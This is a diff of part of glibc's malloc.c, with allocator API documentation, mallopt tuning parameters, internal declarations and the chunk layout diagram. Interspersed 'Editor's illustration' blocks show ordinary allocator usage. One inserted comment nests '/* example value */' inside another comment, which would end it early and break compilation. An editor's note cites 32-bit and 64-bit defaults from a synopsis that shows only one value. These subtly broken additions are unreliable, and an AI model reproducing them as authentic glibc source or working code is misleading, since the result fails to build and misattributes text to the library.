+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
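+
+/* [Editor's illustration -- not part of the original glibc source.]  A small
+   application-level sketch of the behaviour documented above: on failure
+   malloc returns null and sets errno to ENOMEM, while malloc(0) still
+   returns a unique, freeable pointer.  xmalloc is an invented helper name;
+   the block is disabled with #if 0.  */
+#if 0
+#include <errno.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+static void *
+xmalloc (size_t n)
+{
+  void *p = malloc (n);         /* n == 0 still yields a minimum-sized chunk */
+  if (p == NULL && n != 0)
+    {
+      perror ("malloc");        /* errno is ENOMEM here */
+      exit (EXIT_FAILURE);
+    }
+  return p;
+}
+#endif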
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
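+
+/* [Editor's illustration -- not part of the original glibc source.]  Since
+   free(NULL) is harmless but freeing the same pointer twice is not, a common
+   defensive idiom is to null the pointer right after freeing it.  The macro
+   name is invented; the block is disabled with #if 0.  */
+#if 0
+#include <stdlib.h>
+
+#define FREE_AND_NULL(p)  do { free (p); (p) = NULL; } while (0)
+
+/* Usage:  char *buf = malloc (64);  ...  FREE_AND_NULL (buf);
+   A second FREE_AND_NULL (buf) is then a no-op rather than a double free.  */
+#endif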
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
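+
+/* [Editor's illustration -- not part of the original glibc source.]  calloc
+   both zeroes the block and checks the n_elements * element_size
+   multiplication for overflow, unlike a hand-written malloc (n * size).
+   make_table and struct record are invented for the sketch; disabled with
+   #if 0.  */
+#if 0
+#include <stdlib.h>
+
+struct record { int id; char name[32]; };
+
+static struct record *
+make_table (size_t n)
+{
+  /* Returns NULL instead of a too-small block if the product overflows.  */
+  return calloc (n, sizeof (struct record));
+}
+#endif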
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always
+  be reallocated using malloc-copy-free sequences unless
+  the system supports MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
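+
+/* [Editor's illustration -- not part of the original glibc source.]  A
+   sketch of the realloc contract described above: on failure the old block
+   is NOT freed, so the result must be captured in a temporary or the old
+   pointer is leaked.  grow_buffer is an invented helper name; disabled with
+   #if 0.  */
+#if 0
+#include <stdlib.h>
+
+static char *
+grow_buffer (char *old, size_t new_size)
+{
+  char *p = realloc (old, new_size);  /* may extend in place or move the data */
+  if (p == NULL)
+    {
+      free (old);                     /* old is still valid and still ours */
+      return NULL;
+    }
+  return p;
+}
+#endif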
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
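+
+/* [Editor's illustration -- not part of the original glibc source.]  memalign
+   as documented above: the alignment should be a power of two, and on glibc
+   the returned block may be passed to free.  Disabled with #if 0; assumes
+   the memalign declaration from <malloc.h>.  */
+#if 0
+#include <malloc.h>
+
+static void *
+page_aligned_4k (void)
+{
+  return memalign (4096, 4096);   /* 4 KiB block on a 4 KiB boundary */
+}
+#endif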
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
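+
+/* [Editor's illustration -- not part of the original glibc source.]  mallopt
+   usage following the table above: M_MXFAST takes a request size in bytes
+   (0 disables fastbins) and mallopt returns 1 on success, 0 otherwise.
+   Disabled with #if 0; M_MXFAST is guarded because not every installed
+   malloc.h exposes it.  */
+#if 0
+#include <malloc.h>
+#include <stdio.h>
+
+#ifndef M_MXFAST
+# define M_MXFAST 1                    /* standard SVID/XPG parameter number */
+#endif
+
+static void
+tune_allocator (void)
+{
+  if (mallopt (M_MXFAST, 0) == 0)      /* turn fastbins off entirely */
+    fputs ("M_MXFAST rejected\n", stderr);
+  if (mallopt (M_MMAP_THRESHOLD, 256 * 1024) == 0)   /* mmap chunks >= 256 KiB */
+    fputs ("M_MMAP_THRESHOLD rejected\n", stderr);
+}
+#endif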
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   the maximum total allocated space. This will be greater
+		than current total if trimming has occurred.
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
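+
+/* [Editor's illustration -- not part of the original glibc source.]  Reading
+   a few of the mallinfo fields listed above; note the caveat that the fields
+   are ints and may wrap in long-running programs.  Disabled with #if 0.  */
+#if 0
+#include <malloc.h>
+#include <stdio.h>
+
+static void
+report_heap (void)
+{
+  struct mallinfo mi = mallinfo ();
+  printf ("arena=%d bytes, free chunks=%d, free bytes=%d\n",
+          mi.arena, mi.ordblks, mi.fordblks);
+}
+#endif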
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
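+
+/* [Editor's illustration -- not part of the original glibc source.]  A
+   typical malloc_trim call after a large working set has been freed, as
+   described above; the return value reports whether anything was actually
+   handed back.  Disabled with #if 0.  */
+#if 0
+#include <malloc.h>
+#include <stdio.h>
+
+static void
+shrink_after_big_free (void)
+{
+  /* pad == 0: keep only what the allocator needs for its own bookkeeping.  */
+  if (malloc_trim (0))
+    puts ("some memory was returned to the system");
+}
+#endif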
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
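+
+/* [Editor's illustration -- not part of the original glibc source.]
+   malloc_stats takes no arguments and writes its report to stderr, so a
+   bare call is enough while debugging.  Disabled with #if 0.  */
+#if 0
+#include <malloc.h>
+
+static void
+dump_malloc_stats (void)
+{
+  malloc_stats ();    /* totals go to stderr, nothing is returned */
+}
+#endif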
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
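+
+/* [Editor's illustration -- not part of the original glibc source.]  Unlike
+   memalign, posix_memalign reports failure through its return value (an
+   errno-style code, 0 on success) and requires the alignment to be a power
+   of two multiple of sizeof (void *).  aligned_block is an invented helper;
+   disabled with #if 0.  */
+#if 0
+#include <stdlib.h>
+
+static void *
+aligned_block (size_t alignment, size_t size)
+{
+  void *p = NULL;
+  return posix_memalign (&p, alignment, size) == 0 ? p : NULL;
+}
+#endif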
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
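+
+/* [Editor's note.]  Worked out for the two common cases: with SIZE_SZ == 4
+   (32-bit) DEFAULT_MXFAST is 64 * 4 / 4 = 64 bytes, and with SIZE_SZ == 8
+   (64-bit) it is 64 * 8 / 4 = 128 bytes, matching the "64 (for 32bit),
+   128 (for 64bit)" defaults listed in the option synopsis above.  */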
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than the page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
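+
+/*
+  Illustrative sketch (not from the original source): top_pad can also
+  be raised at run time with mallopt (M_TOP_PAD, ...).  For example, if
+  top_pad were set to 128 KiB, the first small request on a fresh,
+  contiguous main arena would ask MORECORE/sbrk for roughly
+  nb + 128 KiB + MINSIZE rounded up to a whole page, so many following
+  small requests are carved from the enlarged top chunk without further
+  sbrk calls.  The 128 KiB figure is only an example value.
+*/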
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb that was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system; when handing out mmapped memory the kernel
+  simply has no choice but to zero it.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64-bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
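+
+/*
+  Illustrative sketch (not from the original source): the threshold can
+  be pinned to a fixed value with mallopt (M_MMAP_THRESHOLD, ...), for
+  example
+
+    mallopt (M_MMAP_THRESHOLD, 1024 * 1024);   /* example value */
+
+  after which requests of at least 1 MiB that cannot be met from
+  already-existing free space are serviced via mmap.  As noted for
+  mp_.no_dyn_threshold below, setting the threshold explicitly also
+  switches off the sliding/dynamic adjustment described above.
+*/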
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
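+
+/*
+  Illustrative sketch (not from the original source): as the text above
+  notes, mmap use for large requests can be switched off entirely with
+
+    mallopt (M_MMAP_MAX, 0);
+
+  after which even very large requests are served from the arena's top
+  chunk instead of being given their own mapping.
+*/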
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, non-exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+#ifndef NO_THREADS
+static void*   malloc_atfork(size_t sz, const void *caller);
+static void      free_atfork(void* mem, const void *caller);
+#endif
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if allocated            | |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                       |M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk                                     |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk                            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                         |P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The two exceptions to all this are
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size field.
+
+*/
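+
+/*
+  Illustrative sketch (not from the original source): the layout above
+  can be observed directly from application code.  The fragment below
+  assumes a typical 64-bit build (SIZE_SZ == 8), where the chunk header
+  starts 16 bytes before the pointer malloc returns and the size field
+  is the second of those two words; on a fresh heap a 24-byte request
+  is expected to show a size field of 0x21 (a 0x20-byte chunk with the
+  PREV_INUSE bit set).
+*/
+#if 0   /* example only -- never compiled as part of malloc */
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+
+int
+main (void)
+{
+  uint8_t *mem = malloc (24);
+  if (mem == NULL)
+    return 1;
+
+  /* mem2chunk: step back 2*SIZE_SZ bytes to the chunk header;
+     prev_size is the first word, size (with flag bits) the second.  */
+  size_t size_field = *(size_t *) (mem - 8);
+  printf ("size field: %#zx\n", size_field);
+
+  free (mem);
+  return 0;
+}
+#endif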
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
